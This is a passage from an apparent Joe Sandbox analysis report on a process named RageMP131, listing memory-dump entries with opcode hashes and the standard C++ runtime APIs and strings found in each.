                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 68c8a78b53464149745752088994439ebc0a68bdef9cc5879acad293f8907830
                                  • Instruction ID: 0fc2ca94311086e1adc07c422d232b4bf378b3a989949e53891c5022f7b6e4e3
                                  • Opcode Fuzzy Hash: 68c8a78b53464149745752088994439ebc0a68bdef9cc5879acad293f8907830
                                  • Instruction Fuzzy Hash: CD01D632610515AFCF16DF6ADC05D9E3B29DB82324B250248F8919B2D1E6B1ED41CBD0
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,003A91F7,00000000,?,003B5D79,00000001,00000364,00000000,00000006,000000FF,?,00000000,003AD244,003A89C3,003A91F7,00000000), ref: 003B6434
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 2678cb5b31c5a0322a27ccfbc2e88bebfa24c4e27d98946444b0e0aad67befd8
                                  • Instruction ID: 4acdd90f581af4dfb00d46bd0567171c988701c64a0205525695f23803b5de7d
                                  • Opcode Fuzzy Hash: 2678cb5b31c5a0322a27ccfbc2e88bebfa24c4e27d98946444b0e0aad67befd8
                                  • Instruction Fuzzy Hash: 04F0B431505924679B236B639C03BDB3B4C9F8176CB268025AA05AAC82CE24DC0186E1
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,003BD635,4D88C033,?,003BD635,00000220,?,003B57EF,4D88C033), ref: 003B6E60
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a4d404628d4d44d3cda38a5ce1ff7b559f195bc8fd00819313ebd3c77fb8f0e5
                                  • Instruction ID: c398f954d106bc5601e8d7938234700b2a7fb90cd076246b8a5384e320de4b34
                                  • Opcode Fuzzy Hash: a4d404628d4d44d3cda38a5ce1ff7b559f195bc8fd00819313ebd3c77fb8f0e5
                                  • Instruction Fuzzy Hash: 70E0ED3910062266DA3322A5CE13BEB764CDF823A8F160520EF059AC92CF28C80087A4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cff440bf535c732e842f638483a3f77d512992c8373e7e0edf52beb7f51be5a6
                                  • Instruction ID: 95981c34e20f0560b93a11a98a32b1fb2e0fbedb3effa7f1183b1638f2201707
                                  • Opcode Fuzzy Hash: cff440bf535c732e842f638483a3f77d512992c8373e7e0edf52beb7f51be5a6
                                  • Instruction Fuzzy Hash: 42119DFB18C221BEA242D5427A68AFE6B6FE5C2370770842AF903C5D07E3D55A0D6231
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09327ee46238bce886b8e127fe5efc11bfc13ce9ce9821a7ae9029250de48d30
                                  • Instruction ID: b7eabfdddd3546d36ef66d38ce60a5c136f18f8520672ac48059b7b1374e995a
                                  • Opcode Fuzzy Hash: 09327ee46238bce886b8e127fe5efc11bfc13ce9ce9821a7ae9029250de48d30
                                  • Instruction Fuzzy Hash: E01190BB148225BEA242D5427B68AFE6B6FE5C2330770842AF903C5D07D3D51A4D6231
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bad878d99da823abe6a82538e861de55afa43e9c2b3f10f171d2e17815fdee49
                                  • Instruction ID: 428068b3f7b3d3ac6b363596ea301f7e62035b5891881a8606ef461a9b7e0f2f
                                  • Opcode Fuzzy Hash: bad878d99da823abe6a82538e861de55afa43e9c2b3f10f171d2e17815fdee49
                                  • Instruction Fuzzy Hash: A111AFBB148220BEA242D5427A68AFEAB6FE5C2330770803AF903C5D07D3D91A0D6271
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cd4c11c4f9e908642bc503cbaa295779b32bfae1e45131daad18fc022d41813
                                  • Instruction ID: 9460d78b247874df00161a2cb4a3db41c24f03cc337a9333f75272a1dbed2ae4
                                  • Opcode Fuzzy Hash: 6cd4c11c4f9e908642bc503cbaa295779b32bfae1e45131daad18fc022d41813
                                  • Instruction Fuzzy Hash: 9311AFFB148220BEA642D5427B68AFEAB6FE5C2330774842AF503C5D07D3C91A1D6271
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fde0085ef66bfcf5d78c4aed69a42e4b024607936f4c274611029a28ecd259a
                                  • Instruction ID: 654c25417b39db825a33b8faf7d65f94cae662f54ec1f4fe5ccac0ae5723ce6b
                                  • Opcode Fuzzy Hash: 7fde0085ef66bfcf5d78c4aed69a42e4b024607936f4c274611029a28ecd259a
                                  • Instruction Fuzzy Hash: 6D11B6FB14C110BEB242D1527A69AFFAB6FE6C27307708427F903C1D47D3951A596271
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c4a4894466b6947da169a4619b9ac8c8b76e415a740f02f5d02b5b70357c0248
                                  • Instruction ID: 3c2616291ba8a74133a05c2477c54e6f6c865e75076e7b709c90f6b847bd0e1c
                                  • Opcode Fuzzy Hash: c4a4894466b6947da169a4619b9ac8c8b76e415a740f02f5d02b5b70357c0248
                                  • Instruction Fuzzy Hash: DA01E1BB14C220EEA682E54276A96FE7B6BE6C23307708027F60385D0792942A596371
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2435c248f2e7d5f6b9deb24751398713918425ac49f10296b4a05333b1f9257d
                                  • Instruction ID: 09a8da06986c9b1a5ef3af6f2db08c773759067a149a75bb1b3d4b51c18474b2
                                  • Opcode Fuzzy Hash: 2435c248f2e7d5f6b9deb24751398713918425ac49f10296b4a05333b1f9257d
                                  • Instruction Fuzzy Hash: 2EF0447A00C210DF8792E55271FD2FE3B57AB933307A0002AFA0349E03C6552A549360
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a876fad5a162737cc11c9d04b4819d7fe2082c528047384655414de5cf53bcc3
                                  • Instruction ID: 243908e820e87b0800e4a5cc4a282e7984d90859195f91e65da8e99f4a90845e
                                  • Opcode Fuzzy Hash: a876fad5a162737cc11c9d04b4819d7fe2082c528047384655414de5cf53bcc3
                                  • Instruction Fuzzy Hash: A2F059BA54C311CF8391F4A2A1FE2FE7F9BB6D33707B0002AF60346E43A284156153A1
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154034651.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50f0000_RageMP131.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 267bcfbe80478f446c4ecffe70e7e3c1e2c9cee89050743df7d3917cde8af3c1
                                  • Instruction ID: e16fff3e03aabb742eff8ce2b4c03ec011425b75444f35deff998b9f384a797d
                                  • Opcode Fuzzy Hash: 267bcfbe80478f446c4ecffe70e7e3c1e2c9cee89050743df7d3917cde8af3c1
                                  • Instruction Fuzzy Hash: 4DF0ECB7558225DB8352B49261EE2FD7B9B77973703F01029F20346E43928915655360
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction ID: 98ccf139a8a4d5b6bb8807c094869e375602db42d7e2cc9e4b51a062b86e78b9
                                  • Opcode Fuzzy Hash: 4df2230cf6d2b22dd9929c0dcf2eb738a93c5ed6b64abc4e5fced81a8044e2fc
                                  • Instruction Fuzzy Hash: 54023B71E012199FDF15CFA9C8806AEBBF5FF49314F258269D919EB380DB31A9418B90
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032F833
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032F855
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032F875
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032F89F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032F90D
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0032F959
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0032F973
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032FA08
                                  • std::_Facet_Register.LIBCPMT ref: 0032FA15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                  • String ID: bad locale name$">
                                  • API String ID: 3375549084-744497921
                                  • Opcode ID: c7da17e2bf791320939d8630616a2901d5bf520318ede485cf7a94a7ed8fbc3f
                                  • Instruction ID: 848c9dcfc6e38abb142eca5ef7d48ebf4a6ad53e006f9f76193b363c08ef0780
                                  • Opcode Fuzzy Hash: c7da17e2bf791320939d8630616a2901d5bf520318ede485cf7a94a7ed8fbc3f
                                  • Instruction Fuzzy Hash: 7361AFB1D00258DFEF12DFA4E845B9EBBB8AF14710F144178E805AB341EB35E905CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C3E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: @3,$@3,$G>,$G>,$`!,$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1824058124
                                  • Opcode ID: a35cf2be4074591dd225ef0c9b237d9c066734985f87b62e2c54f31530a43e87
                                  • Instruction ID: aeeac9620c634ed1c6b9437d40cc3da155b6658ad227f890d80c877a2f21427b
                                  • Opcode Fuzzy Hash: a35cf2be4074591dd225ef0c9b237d9c066734985f87b62e2c54f31530a43e87
                                  • Instruction Fuzzy Hash: 2E41A4B6910205AFCB05DF58C845FEEB7F9EF49310F14CA2EE915D7641E770AA118BA0
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 003A2E47
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 003A2E4F
                                  • _ValidateLocalCookies.LIBCMT ref: 003A2ED8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 003A2F03
                                  • _ValidateLocalCookies.LIBCMT ref: 003A2F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: i?$csm
                                  • API String ID: 1170836740-3060081385
                                  • Opcode ID: b9e9f749dd4044be8acf8585c0536db50f70d73dff611b0bdb3c5e5ccea10a1d
                                  • Instruction ID: 43d3631f161a9df51cda3f839ea66e15e4cb7b7f7bad89945d3594a441bd00bf
                                  • Opcode Fuzzy Hash: b9e9f749dd4044be8acf8585c0536db50f70d73dff611b0bdb3c5e5ccea10a1d
                                  • Instruction Fuzzy Hash: B3419F30A00209AFCF16DF6CC881E9FBBB5EF46314F148156E8149B252D731EE55CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C3E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: @3,$@3,$`!,$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1830230726
                                  • Opcode ID: 1960a754fbad110628dced66654e132ba2cd72f953cb5f37d7ce7e5d525612c8
                                  • Instruction ID: 87725362fa75ff139afb592ef2ea42a8c091f2d3d20d449ca91a7eeba6559391
                                  • Opcode Fuzzy Hash: 1960a754fbad110628dced66654e132ba2cd72f953cb5f37d7ce7e5d525612c8
                                  • Instruction Fuzzy Hash: B921F3B69107056FC715DE58D805F96B7ECAF05310F08C92EFA69CB681E770EA208B90
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C4F72
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C4FFF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C50C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: @3,$`!,$recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-4040103403
                                  • Opcode ID: 29114ef834047216d2e85d22071d2eefd040255a495451995457185fd9ee1277
                                  • Instruction ID: c3df36e84c3e6df68e54e6e440f886dd19e26bb34065404740834babd7423b67
                                  • Opcode Fuzzy Hash: 29114ef834047216d2e85d22071d2eefd040255a495451995457185fd9ee1277
                                  • Instruction Fuzzy Hash: B2E100719106049FCB29EF68D855BAFBBF9FF48300F108A2DE41697B81D774A914CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C799A
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C7B75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$out_of_range$type_error
                                  • API String ID: 2659868963-2346395918
